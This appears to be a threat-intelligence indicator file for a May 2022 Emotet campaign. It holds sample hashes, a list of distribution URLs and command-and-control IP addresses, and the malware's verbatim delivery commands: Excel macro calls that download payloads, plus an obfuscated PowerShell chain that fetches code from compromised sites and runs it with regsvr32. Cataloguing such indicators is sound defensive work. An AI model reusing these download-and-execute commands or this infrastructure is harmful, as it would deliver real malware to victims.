-
Notifications
You must be signed in to change notification settings - Fork 10
/
e4_emotet_18.05.2022.txt
112 lines (91 loc) · 4.96 KB
/
e4_emotet_18.05.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
Emotet 2022 | epoch4 | 18.05.2022 |
************************************************************************************************************
.xls 871c3a560fe16ebb0c953f84ff95e05eb7c5075b8356b09aa43bddeec9c21826
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://oftalmocity.com/wp-admin/xDjDiXhcS/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "htttp://www.omarhospital.com/wp-content/Ved4BBJms7gwl2/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.muslimproperty.co.uk/cgi-bin/8lS/", "..\hvxda.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://goodfriendsdriving.com/createschedule/F0jGvgTiFAMRh2Tr8HL/", "..\hvxda.ocx")
************************************************************************************************************
.zip 4a18d9c74c763d165d598ef0f2df9339009825edf54b2ef2f2d8bcba5cd33289
.lnk da9abd0dd8da13b96d51ff0612460e355863642bd5c953fe7aefece2bdc23b08
.dll 2adb0e66ffcb01ce3d105fa895a443199497e58b40ba4ed3cdd7fb5543c0130e
************************************************************************************************************
Exec >>
cmd /c "C:\Users\Admin\AppData\Local\Temp\Payment with a new address.lnk"
cmd.exe" /v:on /c pM7ToSJLO5PtMA5FrFkOLywy9TqiR91UcbFL8jp2dOhm1qrIUp8FDhMpkluiJJy0IIGY+X6F||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3lhbWFkYS1zaG9zaGkubWFpbi5qcC95YW1hZGEtc2hvc2hpL2xnMS8iLCJodHRwOi8vbXNuZGVzaWduLm5sL2xpYnJhcmllcy9jOE52RlUxNC8iLCJodHRwczovL211c2N1bGF0aW9uLWVzaXNhLmZyL2Nzcy9pVTJTWWxmWXhzay8iLCJodHRwOi8vbWVkcmVnLnV6L0RvY3MvMWtqOHJlZmVMZG90UWVlMmYvIiwiaHR0cDovL3B1bnRhbWltYXJsaWsuY29tLnRyL3dwLWFkbWluLzlJVzdMMWdLd1dPb05RUkVKNi8iLCJodHRwOi8vd2FuZGVybHVzdHBodHJhdmVsLmNvbS9jZ2ktYmluL1FwaGZvUXE0dC8iKTskdD0iQkVoRmNHbW5wIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXElmY3ppTmxiQkwuRW5BO1JlZ3N2cjMyLmV4ZSAiJGRcSWZjemlObGJCTC5FbkEiO2JyZWFrfSBjYXRjaCB7IH19';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"
powershell.exe -c "&{$kRMaFO='ICAgICAgICBXcml0ZS1Ib3N0ICJoWnBJZSI7JFByb2dyZXNzUH';$hLTAQy='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3lhbWFkYS1zaG9zaGkubWFpbi5qcC95YW1hZGEtc2hvc2hpL2xnMS8iLCJodHRwOi8vbXNuZGVzaWduLm5sL2xpYnJhcmllcy9jOE52RlUxNC8iLCJodHRwczovL211c2N1bGF0aW9uLWVzaXNhLmZyL2Nzcy9pVTJTWWxmWXhzay8iLCJodHRwOi8vbWVkcmVnLnV6L0RvY3MvMWtqOHJlZmVMZG90UWVlMmYvIiwiaHR0cDovL3B1bnRhbWltYXJsaWsuY29tLnRyL3dwLWFkbWluLzlJVzdMMWdLd1dPb05RUkVKNi8iLCJodHRwOi8vd2FuZGVybHVzdHBodHJhdmVsLmNvbS9jZ2ktYmluL1FwaGZvUXE0dC8iKTskdD0iQkVoRmNHbW5wIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXElmY3ppTmxiQkwuRW5BO1JlZ3N2cjMyLmV4ZSAiJGRcSWZjemlObGJCTC5FbkEiO2JyZWFrfSBjYXRjaCB7IH19';$RY=[System.Convert]::FromBase64String($kRMaFO+$hLTAQy);$vZ=[System.Text.Encoding]::ASCII.GetString($RY); iex ($vZ)}"
regsvr32.exe C:\Users\Admin\AppData\Local\Temp\..\BEhFcGmnp\IfcziNlbBL.EnA
regsvr32.exe C:\Windows\system32\XzEnFJsk\NNZhBMftHKvliX.dll
************************************************************************************************************
.dll distro
http://yamada-shoshi.main.jp/yamada-shoshi/lg1/
http://msndesign.nl/libraries/c8NvFU14/
https://musculation-esisa.fr/css/iU2SYlfYxsk/
http://medreg.uz/Docs/1kj8refeLdotQee2f/
http://puntamimarlik.com.tr/wp-admin/9IW7L1gKwWOoNQREJ6/
http://wanderlustphtravel.com/cgi-bin/QphfoQq4t/
************************************************************************************************************
c2's
51.254.140.238:7080
103.70.28.102:8080
5.9.116.246:8080
1.234.2.232:8080
209.250.246.206:443
58.227.42.236:80
72.15.201.15:8080
159.65.88.10:8080
189.126.111.200:7080
173.212.193.249:8080
188.44.20.25:443
134.122.66.193:8080
172.104.251.154:8080
103.75.201.2:443
150.95.66.124:8080
153.126.146.25:7080
103.43.75.120:443
203.114.109.124:443
27.54.89.58:8080
1.234.21.73:7080
146.59.226.45:443
185.8.212.130:7080
159.65.140.115:443
167.172.253.162:8080
45.235.8.30:8080
213.241.20.155:443
163.44.196.120:8080
45.118.115.99:8080
102.222.215.74:443
209.126.98.206:8080
77.81.247.144:8080
46.55.222.11:443
110.232.117.186:8080
212.237.17.99:8080
45.176.232.124:443
183.111.227.137:8080
101.50.0.91:8080
173.239.37.178:8080
206.189.28.199:8080
103.132.242.26:8080
201.94.166.162:443
158.69.222.101:443
82.165.152.127:8080
164.68.99.3:8080
209.97.163.214:443
172.105.70.96:443
185.4.135.165:8080
212.24.98.99:8080
149.56.131.28:8080
129.232.188.93:443
131.100.24.231:80
197.242.150.244:8080
94.23.45.86:4143
79.137.35.198:8080
91.207.28.33:8080
167.99.115.35:8080
152.136.229.39:8080
51.91.76.89:8080
119.193.124.41:7080
89.29.244.7:443
151.106.112.196:8080
196.218.30.83:443
160.16.142.56:8080